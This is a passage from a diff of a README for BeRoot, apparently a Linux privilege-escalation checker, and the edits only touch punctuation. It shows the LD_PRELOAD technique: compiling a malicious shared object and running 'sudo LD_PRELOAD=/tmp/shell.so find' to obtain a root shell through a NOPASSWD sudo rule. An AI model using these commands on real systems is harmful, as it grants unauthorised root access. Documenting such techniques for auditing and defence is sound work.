AlessandroZ/BeRoot/Linux/README.md

 }
 ```

-Compile it
+Compile it:
 ```
 gcc -fPIC -shared -o shell.so shell.c -nostartfiles
 ```

-If you have a binary that you could launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object.
+If you have a binary that you could launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object:
 ```
 sudo LD_PRELOAD=/tmp/shell.so find
 ```

-More information can be found [here](http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/)
+More information can be found [here](http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/).

 Sudoers file
 ----